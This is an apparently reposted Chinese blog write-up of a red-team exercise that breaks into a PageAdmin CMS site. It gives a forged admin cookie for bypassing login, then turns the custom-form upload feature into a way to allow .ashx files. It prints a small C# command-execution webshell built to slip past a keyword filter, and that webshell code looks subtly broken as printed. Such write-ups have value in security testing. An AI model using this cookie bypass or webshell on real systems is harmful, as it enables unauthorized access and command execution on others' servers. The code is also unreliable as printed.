从PageAdmin CMS后台到Shell：一次HW实战中的ASP.NET MVC应用渗透剖析-洪萨配资

1. 从PageAdmin CMS后台到Shell的渗透实战

上周参加红蓝对抗演练时遇到一个使用PageAdmin CMS的网站，整个过程还挺有意思。这个基于ASP.NET MVC开发的CMS系统在中小企业中相当常见，但很多管理员可能没意识到，默认配置下它存在一些安全隐患。下面我就详细拆解下从发现后台到最终getshell的全过程，希望能给做安全测试的朋友一些参考。

PageAdmin CMS从2008年发布至今已经迭代到4.0版本，特点是后台功能强大、操作体验友好。但正是这些"强大"的功能，在某些配置不当的情况下可能成为攻击者的突破口。实战中我发现目标网站底部明确标注了"Powered by PageAdmin"，这给了我们第一个线索。

2. 信息收集与后台发现

2.1 常规路径探测

大多数CMS都有默认的后台路径，PageAdmin也不例外。我首先尝试了常见的/admin、/manage等路径，但都返回404。接着试了/master这个PageAdmin的默认后台路径，依然不成功。看来管理员做了基本的防护，修改了默认后台地址。

这时候祭出御剑这类目录扫描工具就很有必要了。经过一番扫描，最终在/console这个不起眼的路径下发现了后台登录页面。这里有个小技巧：扫描时可以优先尝试包含"admin"、"console"、"manager"等关键词的路径，这些是管理员修改后台地址时的常用选择。

2.2 绕过登录验证

找到后台后，下一步就是尝试登录。先测试了几个常见弱口令组合（admin/admin、admin/123456等），不出所料都失败了。这时候乌云社区早年披露的一个漏洞就派上用场了 - 通过修改cookie可以直接绕过登录验证。

具体操作是在浏览器控制台执行：

document.cookie="Master=1&LoginProcess=1&UserName=admin&LOginDate=1&Valicate=12b36e45c2df117d12a068814d826283f9c32f845e1589142208628b13f&Permissions=1";

然后刷新页面就能直接进入后台。这个漏洞的原理是PageAdmin的登录状态验证存在缺陷，攻击者可以通过伪造特定格式的cookie值来欺骗系统认为已经通过认证。虽然这是个老漏洞，但在没有及时更新的系统中仍然可能有效。

3. 受限后台中的突破口

3.1 功能分析与利用点寻找

进入后台后发现这是个"阉割版" - 很多常规的功能模块都被移除了，包括网上常见的通过"专题管理"getshell的方法。不过好在"自定义表单"功能还在，这将成为我们的突破口。

PageAdmin的自定义表单功能本意是让管理员可以灵活创建各种数据收集表单，但它对上传文件的处理存在安全隐患。具体路径是：后台 → 系统管理 → 自定义表单 → 添加新表单。

3.2 文件上传漏洞利用

创建一个新表单后，进入"字段管理"添加字段。关键步骤是：

字段类型选择"文件(file)"
在"允许扩展名"处输入.ashx（系统默认可能只允许图片格式）
保存设置后，该字段就允许上传.ashx文件了

这里有个坑需要注意：系统会检查上传文件内容是否包含"page"关键字，如果包含就会拒绝上传。所以我们需要准备一个不包含这个关键词的.ashx格式的webshell。

我使用的是简化版的cmd马，核心代码如下：

<%@ WebHandler Language="C#" Class="Handler" %> using System; using System.Web; public class Handler : IHttpHandler { public void ProcessRequest(HttpContext ctx) { ctx.Response.Write(System.Diagnostics.Process.Start( new System.Diagnostics.ProcessStartInfo( ctx.Request["cmd"], "/c " + ctx.Request["c"])).StandardOutput.ReadToEnd()); } public bool IsReusable { get { return false; } } }

这个马虽然功能简单，但胜在体积小、不包含敏感关键词，能够绕过内容检测。上传成功后，通过访问对应的.ashx文件并传递cmd参数就能执行系统命令了。